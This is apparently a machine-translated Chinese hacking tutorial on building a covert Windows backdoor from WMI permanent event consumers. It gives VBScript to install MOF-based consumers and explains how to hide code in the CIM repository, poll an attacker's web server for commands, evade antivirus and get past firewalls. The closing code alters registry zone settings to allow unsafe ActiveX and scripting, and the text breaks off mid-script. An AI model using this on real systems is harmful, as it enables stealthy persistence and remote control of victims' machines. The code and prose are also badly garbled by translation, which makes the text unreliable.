set shl = createobject ( "WScript.Shell") set fso = createobject ( "Scripting.FileSystemObject") path = shl.expandenvironmentstrings ( "% windir% / system32 / wbem /") set mof = fso.opentextfile (path & "scrcons. MOF ", 1, false, -1) 'MOF is a unicode format' MOFS = MOF.READALLMOF.CLOSEMOFS = Replace (MOFS," // default "," // CIMv2 ", 1, 1) 'Replace the default Name Space 'Mofp = Path & "Asecivv2.mof" Set MOF = fso.createtextFile (MOFP, FALSE, TRUE)' Create a temporary MOF file 'MOF.WRITE MOFSMOF.CLOSESHL.RUN PATH & "MOFComp.exe -n: root / cimv2" & Mofp, 0, True 'Installing Root / Cimv2'FSo.deletefile (MOFP) WScript.echo "Installation Complete" logout permanent event: nslink = "WinMgmts: //./root/cimv2:" MyconSumer = "stopped_spooler_restart_consumer" specified consumers name 'myfilter = "stopped_spooler_filter"' specify the name of the filter 'set binds = getobject (nslink & "__ FilterToConsumerBinding"). instances_for each bind in binds if strcomp (right (bind.consumer, len (myconsumer) 1), Myconsumer & Chr (34), 1) = 0_ and strphone 1), MyFilter & Chr (34), 1) = 0 THEN GETOBJECT ("WinMgmgg" & Bind.consumer). deleted consumer 'getObject ("WinMgmts:" & bind.filter) .delete_' Delete filter 'bind.delete_' Delete Bind 'exit for end ifnextwscript.echo "Uninstall completion" except for ASEC, WMI Other permanent event consumers are also available, such as SMTPEVENTCONSUMER. When the system appears anomaly, you can automatically send a letter to the administrator's mailbox. Wmitools WMI Event Registration is used to create, modify, delete instances of permanent event consumers, event filters, and timer event sources in the specified namespace, and bind or release them.
Regarding the various parts of the event handling mechanism, there is a detailed story in the "WMI Technical Guide", and it is of course more comprehensive in MSDN. I will not have it. (Look at it, drink your mouth, take a break ^ _ ^) Let's start discussing the scripting back door. WMI provides two timers: __ absolutetimerinstruction, __intervaltimerinstruction, triggering events at the specified time and time interval, registering a filter to capture timer events, then binding ASEC, we gain a rare program from Starting method. Moreover, the script code is completely hidden in the CIM repository, does not exist in an independent file, and the killing is more difficult. This is the advantage of the back door of the script, but there are many difficulties: 1. Script running, Scrcons.exe with the system as a script host (Windows designer yet is not stupid to use WMI services as a script host). This will increase a process, although it is a normal process, anti-virus software is nothing, but it is too conspicuous. So, you can't let the script run in the background, but should start once every time, then end as soon as possible. After the script is over, the Scrcons.exe process will not end automatically, and the script must take the script to take the initiative to terminate the host process with Win32_Process objects provided by WMI (boiled beans 萁 萁 ?!). 2, the network function of the script is very poor, basically only relying on objects such as Microsoft.xmlhttp. Therefore, the script rear door cannot listen to the port and provide the CMD shell, which can only be connected to the web server to get the control command. A viable way is to put a command file on the web server, the script is backed up to find the server according to the domain name and download the command file, and respond according to the content. So, you need a web server, or build a temporary server with tools such as NetBox. Of course, you don't need to let the server always online, you need to control the script after running again. 3. Since the script rear door intermittent operation, it is necessary to prevent the same command from being run again. The solution is to record the length of the command in the registry, compare the length and record each time you get the command, if the same is skipped, the difference overrides and executes the command. 4. In order to penetrate the firewall with the IE object, the XMLHTTP object must be created in IE, which will be limited by the Internet domain security level. Even if the code is saved in the HTML file, use IE to open it, but it is just a "my computer" domain, create an unsafe ActiveX object or the warning dialog will pop up. The solution is to modify the registry and temporarily change the security settings. 5. WScript object is provided by WScript.exe or CScript.exe, while Scrcons.exe is not provided, so many common functions, such as WScript.sleep can't be used. You can't use XMLHTTP asynchronously without Sleep, and synchronous XMLHTTP may be blocked for a long time, which is much more disadvantage over the latter. Calling the ping command delaying a new process, with a "咚" tone with the POPUP method of WScript.Shell. Good in Microsoft.xmlhttp "relatives", such as MSXml2.xmlhttp, msxml2.serverxmlhttp, msxml2.domdocument, Winhttp.winhttpRequest, etc. The last one can set the timeout, just satisfied it. Even if there is more difficulties, the script is still worth challenged.
When the various types of Trojans on broiler have been cleared by the anti-virus software, the latte behind a 24-hour run may be your last hope. Below is a simple script back door core code (no installation function): cmdu = "http://myweb.8866.org/cmd.txt"
Url'cmdw = 4000 'downloaded from the web server URL'cmdw = 4000' Download Timeout 4 second 'cmdl = "HKLM / Software / Microsoft / WBEM / CIMOM / CMDLENGTH"' Record the length of the key value name 'on Error Resume next' ignore unfatched Error '(Comment When I am Defense) Set shl = CreateObject ("wscript.shell")' Although the WScript root object is not used, its child object still can use 'set aso = creteObject ("AdoDb.Stream") SET IE = CreateObject ("InternetExplorer.Application") 'Use IE to bypass firewall' zone = "HKCU / Software / Microsoft / Windows / CurrentVersion / Internet Settings / ZONES / 3" set1 = zone & "/ 1201" set2 = zone & "/ 1400" Set3 = zone & "/ currentleVel" VAL1 = shl.regread (set1) 'Save the original security setting' VAL2 = shl.regread (set2) VAL3 = shl.regread (set3) regd = "reg_dword" shl.Regwrite set1, 0, Regd 'allows unsafe ActiveX'SHL.REGWRITE SET2, 0, REGD' to run in the Internet domain, allows active scripts' SHL.REGWRITE SET3, 0, Regd 'Settings The current Internet domain security level is "custom"' IE.visible = 0 ': ie.visible = 1' (debugging) IE.NAVIGATE "About" & ": blank" "Use string connection purely anti-forum filter 'IE.Document.write _"
